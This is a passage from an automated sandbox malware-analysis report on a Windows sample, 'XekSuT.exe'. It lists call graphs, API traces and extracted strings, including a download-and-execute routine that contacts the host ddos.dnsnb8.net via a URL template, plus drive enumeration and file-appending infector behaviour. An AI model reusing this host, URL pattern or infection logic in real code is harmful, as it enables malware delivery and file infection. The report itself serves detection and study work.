3c26b2 WaitForSingleObject 1232->1233 1234 3c26a2 CreateEventA 1232->1234 1235 3c2708 1233->1235 1236 3c26c1 lstrlen ??2@YAPAXI 1233->1236 1234->1233 1238 3c2736 SetEvent 1235->1238 1240 3c2718 lstrcpy ??3@YAXPAX 1235->1240 1237 3c26da lstrcpy 1236->1237 1236->1238 1239 3c26f1 1237->1239 1238->1150 1239->1238 1240->1239 1242 3c1e13 lstrcpy strrchr 1241->1242 1244 3c1e62 1241->1244 1243 3c1e40 lstrcmpiA 1242->1243 1242->1244 1243->1244 1245 3c1e52 lstrlen 1243->1245 1244->1171 1244->1172 1245->1243 1245->1244 1247 3c1928 1246->1247 1251 3c1924 SetFilePointer CreateFileMappingA MapViewOfFile 1246->1251 1248 3c192e memset GetFileTime 1247->1248 1249 3c194f 1247->1249 1248->1251 1250 3c1954 SetFileTime 1249->1250 1249->1251 1250->1251 1251->1172 1251->1182 1253 3c1c9c 1252->1253 1255 3c1c94 1252->1255 1254 3c1cae memset memset 1253->1254 1253->1255 1254->1255 1255->1172 1256 3c185b GetSystemTimeAsFileTime srand rand srand rand 1255->1256 1256->1186 1262 3c1b93 1257->1262 1259 3c1bca srand 1260 3c1bd8 rand 1259->1260 1261 3c1c08 1260->1261 1261->1260 1263 3c1c29 memset memcpy lstrcat 1261->1263 1266 3c185b GetSystemTimeAsFileTime srand rand srand rand 1262->1266 1263->1205 1265->1207 1266->1259 1268 3c190c 1267->1268 1269 3c18e0 CloseHandle WaitForSingleObject 1267->1269 1268->1214 1268->1222 1270 3c18fb GetExitCodeProcess 1269->1270 1271 3c1907 CloseHandle 1269->1271 1270->1271 1271->1268 1281 3c185b GetSystemTimeAsFileTime srand rand srand rand 1272->1281 1274 3c27b5 wsprintfA CopyFileA 1275 3c27de wsprintfA 1274->1275 1276 3c2840 1274->1276 1277 3c1973 17 API calls 1275->1277 1276->1133 1278 3c280f 1277->1278 1279 3c2820 CreateFileA 1278->1279 1280 3c2813 DeleteFileA 1278->1280 1279->1276 1280->1279 1281->1274 1283 3c11c6 AdjustTokenPrivileges 1282->1283 1284 3c1200 CloseHandle 1282->1284 1285 3c11f6 1283->1285 1286 3c11f7 CloseHandle 1283->1286 1284->1069 1285->1286 1286->1284 1288 3c123f GetCurrentProcessId OpenProcess 1287->1288 1289 3c1310 1287->1289 1288->1289 1290 3c1262 1288->1290 1289->1067 1296 3c1319 1289->1296 1291 3c12b0 VirtualAlloc 1290->1291 1292 3c12f1 CloseHandle 1290->1292 1294 3c12b8 1290->1294 1295 3c1296 VirtualFree 1290->1295 1291->1290 1291->1294 1292->1289 1293 3c1302 VirtualFree 1292->1293 1293->1289 1294->1292 1295->1291 1297 3c134a 1296->1297 1298 3c132a GetModuleHandleA GetProcAddress 1296->1298 1299 3c1351 memset 1297->1299 1300 3c1363 1297->1300 1298->1297 1298->1300 1299->1300 1300->1067 1300->1075 1301->1088 1303 3c1196 1302->1303 1304 3c10ba 1302->1304 1304->1303 1320 3c185b GetSystemTimeAsFileTime srand rand srand rand 1304->1320 1306 3c1118 wsprintfA wsprintfA URLDownloadToFileA 1307 3c10dc 1306->1307 1308 3c1168 lstrlen Sleep 1306->1308 1311 3c1000 CreateFileA 1307->1311 1308->1304 1312 3c1025 GetFileSize CreateFileMappingA MapViewOfFile 1311->1312 1313 3c1092 WinExec lstrlen 1311->1313 1314 3c107b 1312->1314 1315 3c1057 1312->1315 1313->1303 1313->1304 1316 3c108d CloseHandle 1314->1316 1317 3c1087 CloseHandle 1314->1317 1318 3c1074 UnmapViewOfFile 1315->1318 1319 3c1061 1315->1319 1316->1313 1317->1316 1318->1314 1319->1318 1320->1306 1339 3c2361 1340 3c236b UnmapViewOfFile 1339->1340 1341 3c2374 1339->1341 1340->1341 1342 3c2379 CloseHandle 1341->1342 1343 3c2382 1341->1343 1342->1343 1344 3c2388 CloseHandle 1343->1344 1345 3c2391 1343->1345 1344->1345

                                                                                                                Callgraph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                • Opacity -> Relevance
                                                                                                                • Disassembly available
                                                                                                                callgraph 0 Function_003C28B8 7 Function_003C239D 0->7 17 Function_003C2692 0->17 40 Function_003C1E6E 0->40 45 Function_003C29E2 0->45 1 Function_003C1638 10 Function_003C139F 1->10 11 Function_003C1718 1->11 12 Function_003C1099 1->12 30 Function_003C1581 1->30 50 Function_003C17D0 1->50 51 Function_003C2C48 1->51 2 Function_003C6834 3 Function_003C6734 25 Function_003C6A84 3->25 27 Function_003C6D00 3->27 31 Function_003C6B02 3->31 4 Function_003C69B0 5 Function_003C67A4 6 Function_003C65A6 8 Function_003C189D 7->8 16 Function_003C1915 7->16 7->45 9 Function_003C119F 10->9 13 Function_003C1319 10->13 20 Function_003C120E 10->20 37 Function_003C2CF0 11->37 26 Function_003C1000 12->26 49 Function_003C185B 12->49 14 Function_003C2D9B 15 Function_003C6014 18 Function_003C6012 19 Function_003C2B8C 32 Function_003C2B7D 19->32 54 Function_003C2845 19->54 21 Function_003C680F 22 Function_003C1D8A 23 Function_003C1B8A 23->49 24 Function_003C600A 25->21 38 Function_003C6CF2 25->38 26->50 27->4 27->38 46 Function_003C6B63 27->46 28 Function_003C6001 28->24 29 Function_003C1C81 30->49 31->46 32->45 33 Function_003C6CF8 34 Function_003C1AF9 34->1 35 Function_003C6076 52 Function_003C66C8 35->52 36 Function_003C1DF6 38->33 39 Function_003C1973 39->49 40->14 40->16 40->22 40->23 40->29 40->34 40->36 41 Function_003C1C68 40->41 42 Function_003C2D60 40->42 40->49 43 Function_003C14E1 43->1 43->34 44 Function_003C2361 44->14 45->0 46->2 46->4 46->5 47 Function_003C235D 48 Function_003C6158 48->52 51->19 51->39 52->25 52->27 52->31 53 Function_003C274A 53->39 53->49 54->7 54->17 54->53

                                                                                                                Executed Functions

                                                                                                                Function 003C29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128stringfileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 101 3c29e2-3c2a34 memset wsprintfA 102 3c2abc-3c2b21 memset * 2 FindFirstFileA call 3c28b8 memset 101->102 103 3c2a3a-3c2a86 memset lstrlen lstrcpyn strrchr 101->103 108 3c2b61-3c2b6b FindNextFileA 102->108 103->102 105 3c2a88-3c2a98 103->105 105->102 107 3c2a9a-3c2aa7 lstrcmpiA 105->107 109 3c2aad-3c2aba lstrlen 107->109 110 3c2b74-3c2b7a 107->110 111 3c2b6d-3c2b6e FindClose 108->111 112 3c2b23-3c2b2a 108->112 109->102 109->107 111->110 113 3c2b4c-3c2b5c call 3c28b8 112->113 114 3c2b2c-3c2b33 112->114 113->108 114->113 115 3c2b35-3c2b4a lstrcmpiA 114->115 115->111 115->113
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                                                                                                • String ID: %s*$C:\$Documents and Settings
                                                                                                                • API String ID: 2826467728-110786608
                                                                                                                • Opcode ID: 8cd6e35f4c0c35389192d905c0ca717eb11f0dcb942da10b762e48713665a7c6
                                                                                                                • Instruction ID: 723289a0f609dd17c1b45d997e1b183c0b25416b3a2808884a10a57f35261411
                                                                                                                • Opcode Fuzzy Hash: 8cd6e35f4c0c35389192d905c0ca717eb11f0dcb942da10b762e48713665a7c6
                                                                                                                • Instruction Fuzzy Hash: A34145B3404349AFD722DBA0DC49EEB77ACEB84315F04492DF545D7111EA35EE4887A2
                                                                                                                Function 003C1099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74stringsleepprocessCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 172 3c1099-3c10b4 173 3c1199-3c119c 172->173 174 3c10ba-3c10c7 172->174 175 3c10c8-3c10d4 174->175 176 3c10da 175->176 177 3c1184-3c1190 175->177 178 3c1113-3c1162 call 3c185b wsprintfA * 2 URLDownloadToFileA 176->178 177->175 179 3c1196-3c1198 177->179 182 3c10dc-3c110d call 3c1000 WinExec lstrlen 178->182 183 3c1168-3c1182 lstrlen Sleep 178->183 179->173 182->178 182->179 183->177 183->178
                                                                                                                APIs
                                                                                                                  • Part of subcall function 003C185B: GetSystemTimeAsFileTime.KERNEL32(003C1F92,00000000,?,00000000,?,?,?,003C1F92,?,00000000,00000002), ref: 003C1867
                                                                                                                  • Part of subcall function 003C185B: srand.MSVCRT ref: 003C1878
                                                                                                                  • Part of subcall function 003C185B: rand.MSVCRT ref: 003C1880
                                                                                                                  • Part of subcall function 003C185B: srand.MSVCRT ref: 003C1890
                                                                                                                  • Part of subcall function 003C185B: rand.MSVCRT ref: 003C1894
                                                                                                                • WinExec.KERNEL32(?,00000005), ref: 003C10F1
                                                                                                                • lstrlen.KERNEL32(003C4748), ref: 003C10FA
                                                                                                                • wsprintfA.USER32 ref: 003C112A
                                                                                                                • wsprintfA.USER32 ref: 003C1143
                                                                                                                • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 003C115B
                                                                                                                • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 003C1169
                                                                                                                • Sleep.KERNEL32 ref: 003C1179
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                                                                                                • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG<$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                                                • API String ID: 1280626985-347476361
                                                                                                                • Opcode ID: 2772db15e1146c17cdc7ced80cca5488cae07604988378e299e435ac297391fd
                                                                                                                • Instruction ID: 36e0a791c3041ab6173331723dcab9551f7f5fbd6a8ff73c372d3360b0b77300
                                                                                                                • Opcode Fuzzy Hash: 2772db15e1146c17cdc7ced80cca5488cae07604988378e299e435ac297391fd
                                                                                                                • Instruction Fuzzy Hash: 84218C76900258BEDB22EBA0DC58FEEBBBCAB06315F158099E501E2051D774AF84DF60
                                                                                                                Function 003C6076 Relevance: 14.6, APIs: 7, Strings: 1, Instructions: 614memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 216 3c6076-3c6079 217 3c607b-3c6080 216->217 218 3c60e0-3c60eb 216->218 220 3c60f7-3c60f8 217->220 221 3c6082-3c6085 217->221 219 3c60ee-3c60f4 218->219 222 3c60f6 219->222 223 3c60fe-3c6106 220->223 224 3c60fa-3c60fc call 3c66c8 220->224 221->222 225 3c6087 221->225 222->220 227 3c6108-3c611d 223->227 228 3c6155-3c6189 VirtualFree 223->228 224->223 225->219 229 3c6089-3c6095 225->229 231 3c611f-3c6121 227->231 234 3c618c-3c6192 228->234 232 3c6097-3c609f 229->232 233 3c60a1-3c60aa 229->233 235 3c6151-3c6154 231->235 236 3c6123 231->236 232->233 237 3c61ba-3c61c8 233->237 238 3c60b0-3c60c1 VirtualAlloc 233->238 239 3c6198-3c61b0 VirtualFree 234->239 240 3c60c7-3c60cf 234->240 235->228 236->235 243 3c6125-3c6128 236->243 241 3c61ca-3c61d7 237->241 242 3c6243-3c6251 237->242 238->240 239->237 246 3c61b2-3c61b4 239->246 240->234 250 3c60d5-3c60df VirtualAlloc 240->250 247 3c61dd-3c61e0 241->247 244 3c6264-3c626f 242->244 245 3c6253 242->245 248 3c612a-3c612e 243->248 249 3c6134-3c613b 243->249 252 3c6271-3c6276 244->252 251 3c6255-3c6258 245->251 246->237 247->242 253 3c61e2-3c61f2 247->253 248->249 257 3c6130-3c6132 248->257 256 3c613d-3c614f 249->256 249->257 250->218 251->244 258 3c625a-3c6262 251->258 259 3c627c-3c6289 252->259 260 3c6389-3c63b1 VirtualProtect 252->260 261 3c61f5-3c61fe 253->261 256->231 257->231 258->251 274 3c628b 259->274 275 3c6292-3c6298 259->275 262 3c63b7-3c63ba 260->262 263 3c620c-3c6219 261->263 264 3c6200-3c6203 261->264 266 3c63fc-3c63ff VirtualProtect 262->266 267 3c63bc-3c63c2 262->267 265 3c6238-3c623f 263->265 269 3c621b-3c6228 264->269 270 3c6205-3c6208 264->270 265->261 272 3c6241 265->272 273 3c6400-3c6416 266->273 267->267 271 3c63c4 267->271 269->265 276 3c622a-3c6236 270->276 277 3c620a 270->277 271->266 281 3c63c6-3c63cf 271->281 272->247 279 3c6418-3c641d 273->279 280 3c6420-3c6425 273->280 274->275 278 3c62a2-3c62ac 275->278 276->265 277->265 282 3c62ae 278->282 283 3c62b1-3c62c8 278->283 284 3c63d4-3c63d8 281->284 285 3c63d1 281->285 282->283 286 3c62ce-3c62d4 283->286 287 3c6373-3c6384 283->287 288 3c63dd-3c63e1 284->288 289 3c63da 284->289 285->284 290 3c62da-3c62f1 286->290 291 3c62d6-3c62d9 286->291 287->252 292 3c63e7-3c63fa VirtualProtect 288->292 293 3c63e3 288->293 289->288 295 3c6365-3c636e 290->295 296 3c62f3-3c62f9 290->296 291->290 292->262 292->266 293->292 295->278 297 3c62fb-3c630f 296->297 298 3c6314-3c6326 296->298 299 3c6426-3c64c0 297->299 300 3c634c-3c6360 298->300 301 3c6328-3c634a 298->301 310 3c6535-3c6537 299->310 311 3c64c2 299->311 300->299 301->295 312 3c6539 310->312 313 3c659a 310->313 314 3c64f8 311->314 315 3c64c5-3c64cd 311->315 318 3c653b-3c6541 312->318 319 3c65b4 312->319 320 3c659b-3c659d 313->320 316 3c656c-3c656f 314->316 317 3c64fa-3c64fe 314->317 321 3c64cf-3c64d4 315->321 322 3c6542-3c6545 315->322 326 3c6572 316->326 317->326 327 3c6500 317->327 318->322 325 3c65be-3c6608 319->325 328 3c659f 320->328 329 3c6591-3c6593 320->329 323 3c64d6-3c64d9 321->323 324 3c6517-3c651c 321->324 330 3c654d-3c6550 322->330 323->330 333 3c64db-3c64f5 323->333 337 3c651d-3c651e 324->337 338 3c6583-3c6587 324->338 334 3c6573-3c6576 326->334 335 3c6522-3c6533 327->335 336 3c6502 327->336 331 3c6588-3c658b 328->331 329->320 339 3c6595 329->339 330->325 332 3c6552-3c6556 330->332 343 3c658d-3c658f 331->343 344 3c65a1-3c65a3 331->344 340 3c6578-3c657f 332->340 341 3c6558-3c6569 332->341 333->314 334->340 335->310 336->334 342 3c6504-3c6513 336->342 337->335 338->331 339->313 340->338 341->316 342->310 346 3c6515 342->346 343->329 346->324
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 003C60BE
                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 003C60DF
                                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 003C6189
                                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 003C61A5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$AllocFree
                                                                                                                • String ID: kernel32.dll
                                                                                                                • API String ID: 2087232378-1793498882
                                                                                                                • Opcode ID: 621a3066ca2bd9a9425db078893b70ebb09a415472c7c4598c8aa5b83e7a16b5
                                                                                                                • Instruction ID: 69ea61542314a796dcfd31355d36cf276f92efecea5d65779cac2ef4887168cb
                                                                                                                • Opcode Fuzzy Hash: 621a3066ca2bd9a9425db078893b70ebb09a415472c7c4598c8aa5b83e7a16b5
                                                                                                                • Instruction Fuzzy Hash: CE1221B25087848FDB328F64CC56FEA3BA4EF02310F1945AED88ACB693D674AD01C755
                                                                                                                Function 003C1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65timeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 348 3c1718-3c1733 GetSystemTimeAsFileTime 349 3c1754-3c1758 348->349 350 3c1735-3c1752 SHSetValueA 348->350 351 3c17c6-3c17cd 349->351 352 3c175a-3c1784 SHGetValueA 349->352 350->351 352->351 353 3c1786-3c17b3 call 3c2cf0 * 2 352->353 353->351 358 3c17b5 353->358 359 3c17bf 358->359 360 3c17b7-3c17bd 358->360 359->351 360->351 360->359
                                                                                                                APIs
                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XekSuT.exe), ref: 003C1729
                                                                                                                • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 003C174C
                                                                                                                • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 003C177C
                                                                                                                • __aulldiv.LIBCMT ref: 003C1796
                                                                                                                • __aulldiv.LIBCMT ref: 003C17A8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TimeValue__aulldiv$FileSystem
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\XekSuT.exe$SOFTWARE\GTplus$Time
                                                                                                                • API String ID: 541852442-4253519813
                                                                                                                • Opcode ID: e99cfb7b85ee52f50c76c78203ccb83d2dd6313ebaf872645b9fd0aaf833ca19
                                                                                                                • Instruction ID: 6b917fdeffe3dafc1c96bd68ac0cd107a7a91421a5a3aef7de37dd2becf98410
                                                                                                                • Opcode Fuzzy Hash: e99cfb7b85ee52f50c76c78203ccb83d2dd6313ebaf872645b9fd0aaf833ca19
                                                                                                                • Instruction Fuzzy Hash: 00118272A00209BFDB12AB94CC89FEF7BBCEB45B54F10C519F901F6181D6719E459B60
                                                                                                                Function 003C2B8C Relevance: 10.6, APIs: 7, Instructions: 74threadstringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 361 3c2b8c-3c2bc6 memset GetLogicalDriveStringsA 362 3c2bc8-3c2bcc 361->362 363 3c2c09-3c2c28 WaitForMultipleObjects 361->363 366 3c2bce-3c2bd0 362->366 367 3c2bfa-3c2c07 lstrlen 362->367 364 3c2c3c-3c2c45 363->364 365 3c2c2a-3c2c3a CreateThread 363->365 365->364 366->367 368 3c2bd2-3c2bdc GetDriveTypeA 366->368 367->362 367->363 368->367 369 3c2bde-3c2be1 368->369 369->367 370 3c2be3-3c2bf6 CreateThread 369->370 370->367
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 003C2BA6
                                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 003C2BB4
                                                                                                                • GetDriveTypeA.KERNEL32(?), ref: 003C2BD3
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,003C2B7D,?,00000000,00000000), ref: 003C2BEE
                                                                                                                • lstrlen.KERNEL32(?), ref: 003C2BFB
                                                                                                                • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 003C2C16
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,003C2845,00000000,00000000,00000000), ref: 003C2C3A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1073171358-0
                                                                                                                • Opcode ID: 4163f3558b91fa3eb08fa0c922e1258ef2734a8b91dfe1248867058501003353
                                                                                                                • Instruction ID: 1ebeb6a579c03debef39ae02c49b7861cedc4711a5ab55b29622c2b8f1d85a34
                                                                                                                • Opcode Fuzzy Hash: 4163f3558b91fa3eb08fa0c922e1258ef2734a8b91dfe1248867058501003353
                                                                                                                • Instruction Fuzzy Hash: 5521A5B284015CAFE722AFA4AC84EEF7B6DFB05344F164129F952D2151D734AD06CB61
                                                                                                                Function 003C1E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 3c1e6e-3c1e95 call 3c2d60 3 3c1e9c-3c1eaa call 3c1df6 0->3 4 3c1e97 call 3c1d8a 0->4 8 3c1eb0-3c1ed9 SetFileAttributesA CreateFileA 3->8 9 3c2332 3->9 4->3 8->9 10 3c1edf-3c1f28 call 3c1915 SetFilePointer CreateFileMappingA MapViewOfFile 8->10 11 3c2338-3c233b 9->11 10->9 18 3c1f2e-3c1f39 10->18 13 3c233d-3c2340 UnmapViewOfFile 11->13 14 3c2346-3c2349 11->14 13->14 16 3c234b-3c234e CloseHandle 14->16 17 3c2350-3c2354 14->17 16->17 19 3c2356-3c235b CloseHandle 17->19 20 3c2391-3c239a call 3c2d9b 17->20 18->9 21 3c1f3f-3c1f56 18->21 19->20 21->9 23 3c1f5c-3c1f64 21->23 23->9 25 3c1f6a-3c1f70 23->25 25->9 26 3c1f76-3c1f87 call 3c1c81 25->26 26->9 29 3c1f8d-3c1fa7 call 3c185b call 3c1c81 26->29 29->9 34 3c1fad-3c1fb4 29->34 35 3c2024-3c2045 34->35 36 3c1fb6-3c1fc5 call 3c1af9 34->36 35->9 38 3c204b-3c204e 35->38 36->35 44 3c1fc7-3c1fd2 36->44 39 3c2070-3c20f4 call 3c1af9 * 2 call 3c1c68 * 2 memset * 2 38->39 40 3c2050-3c2053 38->40 62 3c20f5-3c20fe 39->62 42 3c2056-3c205a 40->42 42->39 45 3c205c-3c2061 42->45 44->9 47 3c1fd8-3c1fe7 44->47 45->9 48 3c2067-3c206e 45->48 50 3c1fef-3c2006 call 3c1af9 47->50 51 3c1fe9-3c1fec 47->51 48->42 57 3c2008-3c200e call 3c1c68 50->57 58 3c2013-3c201e FlushViewOfFile 50->58 51->50 57->58 58->35 63 3c2130-3c2139 62->63 64 3c2100-3c2114 62->64 65 3c213c-3c2142 63->65 66 3c212d-3c212e 64->66 67 3c2116-3c212a 64->67 68 3c215c 65->68 69 3c2144-3c2150 65->69 66->62 67->66 72 3c215f-3c2162 68->72 70 3c2157-3c215a 69->70 71 3c2152-3c2154 69->71 70->65 71->70 73 3c2164-3c2171 72->73 74 3c2181-3c2184 72->74 75 3c232a-3c232d 73->75 76 3c2177-3c217e 73->76 77 3c218d-3c21ba call 3c1c68 74->77 78 3c2186 74->78 75->72 76->74 81 3c21bc-3c21d0 call 3c1c68 77->81 82 3c21d3-3c220b call 3c1c81 call 3c1c68 77->82 78->77 81->82 89 3c220d-3c2218 call 3c1c68 82->89 90 3c221b-3c221e 82->90 89->90 92 3c2226-3c231a memcpy UnmapViewOfFile CloseHandle call 3c1b8a call 3c185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 3c1915 90->92 93 3c2220-3c2223 90->93 100 3c231f-3c2328 CloseHandle 92->100 93->92 100->11
                                                                                                                APIs
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,003C32B0,00000164,003C2986,?), ref: 003C1EB9
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 003C1ECD
                                                                                                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 003C1EF3
                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 003C1F07
                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 003C1F1D
                                                                                                                • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 003C201E
                                                                                                                • memset.MSVCRT ref: 003C20D8
                                                                                                                • memset.MSVCRT ref: 003C20EA
                                                                                                                • memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C222D
                                                                                                                • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C2238
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C224A
                                                                                                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C22C6
                                                                                                                • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C22CB
                                                                                                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C22DD
                                                                                                                • WriteFile.KERNEL32(000000FF,003C4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C22F7
                                                                                                                • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C230D
                                                                                                                • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C2322
                                                                                                                • UnmapViewOfFile.KERNEL32(?,?,003C32B0,00000164,003C2986,?), ref: 003C2340
                                                                                                                • CloseHandle.KERNEL32(?,?,003C32B0,00000164,003C2986,?), ref: 003C234E
                                                                                                                • CloseHandle.KERNEL32(000000FF,?,003C32B0,00000164,003C2986,?), ref: 003C2359
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
